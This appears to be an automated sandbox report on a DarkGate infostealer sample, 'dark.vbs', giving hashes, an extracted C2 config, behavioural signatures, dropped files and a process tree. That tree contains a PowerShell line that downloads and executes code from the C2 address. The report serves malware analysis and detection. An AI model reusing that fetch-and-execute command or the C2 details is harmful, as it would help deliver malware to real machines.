Overview

overview

10

Static

static

1

dark.vbs

windows7-x64

3

dark.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-03-2024 12:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dark.vbs

  • Size

    5KB

  • MD5

    3b2e1c5604f68a43495f3829c31f12e3

  • SHA1

    ddc0158fa56458c9235598fdbf2ff49d87c93bb1

  • SHA256

    ad806df85dfb29cca1f3a2c99ed069c30cd870bae9d47f2de4c7ce727b9622ec

  • SHA512

    853b8afbffbbf8a24639f27fd2ddd5b5713e85f7ddcd8a020a050ba40fcf391cf29aa047cfc335b69b5828b740f145b6b27b1149f07234817b991545b3ab38f6

  • SSDEEP

    96:DaUEmyDTEBzylU+/V9rkcQ3tZUHg4KRZZoPC8Wuo9d3uV0m:DaU0TEBzj+/V9g/tZUHg4KR/oa8Wuo9I

Score
10/10
darkgatepruebasvbspersistencestealer

Malware Config

Extracted

Family

darkgate

Botnet

pruebasvbs

C2

149.56.252.31

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    8094

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    mwsMGaLY

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    pruebasvbs

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Detect DarkGate stealer 11 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
      PID:2856
      • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        2⤵
        • Adds Run key to start application
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:3828
    • C:\Windows\system32\wbem\unsecapp.exe
      C:\Windows\system32\wbem\unsecapp.exe -Embedding
      1⤵
        PID:3004
        • C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
          "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of WriteProcessMemory
          PID:3156
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
          PID:3816
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dark.vbs"
          1⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3984
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '149.56.252.31:8094/mgmmrccw')
            2⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4616
            • C:\temp\AutoIt3.exe
              "C:\temp\AutoIt3.exe" script.a3x
              3⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1636

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\aefbadb\hecceeh
          Filesize

          1KB

          MD5

          33df8b13f91ecc133990d933a8a0ef61

          SHA1

          1e6ebd362d4e28ddb9d5df2b6e6fa05b2de9c522

          SHA256

          a5aba4a25366ccd8996e4c31026a4ac993d9c76ddae5103e652d3e75d6b99039

          SHA512

          67c8b30b2cce25da7776dc78b9fc13f65176f7c813bf40c9fca0d97a58e75fe1030c52c264c0fc632edc5bbcd63ef5331e46076ca57d15fe541f0bca2ec67f8a

          Download Submit

        • C:\ProgramData\aefbadb\hhabfdd.a3x
          Filesize

          472KB

          MD5

          3c7921b2fb23121182e5a8c75358468c

          SHA1

          56e0f9b33b72a288e8cd586fe51b7c410e480bac

          SHA256

          c81d73ec0f4d707a19e1cd55e2bf75a9c97b013ca7f0ba8ef09783df073311d1

          SHA512

          16b55e582cae9221b87a64cada92f75b9ce834476b9493a4e9a85be0c0b6329c4e04b34f12c6e4631007e361a54594a2f9f46928399e51568843894ebbd3ba19

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_meyud4yt.dj0.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\FdbaEcH
          Filesize

          32B

          MD5

          f36eee19a9ab64c2033c0f6eee8a1f9b

          SHA1

          378cbddd6981da8fad2b1a9c4a00a79c59f44d8b

          SHA256

          d26d237d267139e9223a33769fedf739c7e7e1411d370f652da9bc0be66fc2a0

          SHA512

          f89092e5124f9e823c3b6128628c83c964da0c51a5c251dcd43a2a45ff8947eb8464520c5381c8f367db9573363bef3d62839317ca21c7944e7c5dbe5087ccb7

          Download Submit

        • C:\temp\AutoIt3.exe
          Filesize

          872KB

          MD5

          c56b5f0201a3b3de53e561fe76912bfd

          SHA1

          2a4062e10a5de813f5688221dbeb3f3ff33eb417

          SHA256

          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

          SHA512

          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

          Download Submit

        • C:\temp\fchcefa
          Filesize

          4B

          MD5

          50e153e47a2520e21e7476131426723c

          SHA1

          93ebf7997031cdf52ecd42a943068becca55e7e6

          SHA256

          a7241adb75aab51167e69b8a4a790fc735cfb638b24c874de3dcf979913f981e

          SHA512

          18a45caf82d3a8e9949a3e9fd3e205c201b4dcabfb2f74021b78150c3afe3a5183242d76746198ab9a0fe9545f14394ad3e326ed3bdabadb1956588698353b46

          Download Submit

        • C:\temp\fchcefa
          Filesize

          4B

          MD5

          e14835e60cc9b86ea35d8451d0c80aad

          SHA1

          70d6af9f80d390e1f42452ca8049621e5f33bd55

          SHA256

          6b67099c7d0ddc927da2d4f2ea92f9f059773c716223f6d06cd74a5dd653aa2f

          SHA512

          e6f2357d6218206e03d30c1642898269b7e779cd144eb6a6c49b3982849626fa83151fbc61e59124da369fcb253f54a40f8f1602611aeee452f9f4a6368d2a6a

          Download Submit

        • C:\temp\fgfbdef
          Filesize

          4B

          MD5

          e4aca1283661e4611695f79d3ea50733

          SHA1

          10d0878039a69a19200257444c0f8b4cf80bd877

          SHA256

          c81ce880961b8efd7f3fd7da70638af1facb691c4ee9c1f87c6e4355e8823df7

          SHA512

          02666071b3a151e5b2f0b3930b5400c2857a91be5d85b77e7d21d3fcd78c8a02191fbf1d10f99e58d7863a7906bd812cd49488c5c62697ccddc9c7f88b09abf1

          Download Submit

        • C:\temp\script.a3x
          Filesize

          467KB

          MD5

          50862376b34880a80a32406444f4a8cb

          SHA1

          20997faf801af300f4524b5a785d1f246bb79f49

          SHA256

          508251503639845117e170fe5ae1b0d7b8953e8336119a71d04e7bdce962d980

          SHA512

          c17fc05332ce333f3dcae3e6d0524386500953cb48e55996516913cdb9b415d4c940c59a8311efc31663ae4c6710f44b18ba63016cb9f100ffe8edf0985a0f7d

          Download Submit

        • C:\temp\test.txt
          Filesize

          76B

          MD5

          e12c09ed641531b7225b26ff6991a506

          SHA1

          697ec598b870b394d237b9bccf4eef18e1619ee5

          SHA256

          692f4ba2a4bce266d9228dd0a3e11a5cd2e4b201b5ce459eef64dcb9d043f73c

          SHA512

          8370d91bc0dc6c0e924e45658f6e62ec04d3f2654133c6799ab0e7f839a52556db4e04615dadda9fc97a88b3a18916e4fb286efccc6713b9a4e8cd8700915b83

          Download Submit

        • memory/1636-47-0x00000000065B0000-0x00000000068FF000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1636-35-0x00000000050C0000-0x0000000006090000-memory.dmp

          Filesize

          15.8MB

          Download

        • memory/1636-36-0x00000000065B0000-0x00000000068FF000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/3156-63-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/3156-46-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/3156-59-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/3156-58-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/3156-51-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/3156-57-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/3828-56-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/3828-64-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/3828-62-0x0000000002920000-0x00000000030C2000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/4616-12-0x00000163726C0000-0x00000163726D0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4616-0-0x0000016373130000-0x0000016373152000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4616-27-0x00000163726C0000-0x00000163726D0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4616-11-0x00000163726C0000-0x00000163726D0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4616-10-0x00007FFD2A400000-0x00007FFD2AEC1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4616-26-0x00000163726C0000-0x00000163726D0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4616-31-0x00007FFD2A400000-0x00007FFD2AEC1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4616-13-0x00000163737E0000-0x00000163739A2000-memory.dmp

          Filesize

          1.8MB

          Download